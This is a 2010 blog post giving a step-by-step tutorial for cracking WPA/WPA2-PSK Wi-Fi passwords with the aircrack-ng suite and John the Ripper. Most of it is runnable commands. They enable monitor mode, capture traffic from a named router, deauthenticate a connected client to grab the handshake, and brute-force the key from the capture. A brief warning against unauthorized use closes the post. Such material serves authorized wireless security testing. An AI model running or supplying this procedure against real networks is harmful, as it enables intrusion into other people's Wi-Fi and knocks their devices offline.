Friday, April 16, 2010

HOWTO : Crack WPA/WPA2-PSK with John the Ripper

At the moment, we need to use dictionaries to brute force the WPA/WPA-PSK. To crack WPA/WPA2-PSK requires the to be cracked key is in your dictionaries.

I have a better solution to crack WPA/WPA2-PSK (in theory, it must success) but it requires hours to years to crack depending on the strength of the key and the speed of the hardwares. The following tutorial is based on Back|Track 4.

Suppose the wifi channel is 5, the BSSID MAC is 00:24:B2:A0:51:14 and the client MAC is 00:14:17:94:90:0D. Make sure the client is connecting to the wifi router when you are performing Step 1 to 4.

Step 1 :
airmon-ng start wlan0

Step 2 :
airodump-ng mon0

Step 3 :
airodump-ng --channel 5 --write output --bssid 00:24:B2:A0:51:14 mon0

Step 4 :
aireplay-ng --deauth 10 -a 00:24:B2:A0:51:14 -c 00:14:17:94:90:0D mon0

To get the handshake when done and then go to next step. If not, do it again until you get the handshake.

Step 5 :
/pentest/password/jtr/john --stdout --incremental:all | aircrack-ng -b 00:24:B2:A0:51:14 -w - output*.cap

You are required to wait for hours or years for the cracking which is depends on how powerful your hardwares are and strength of the key. CUDA will make the work more easier but it may also need years or so just depends.

WARNING : Do NOT crack any wifi router without authorization or you will be put into jail.

That's all. See you!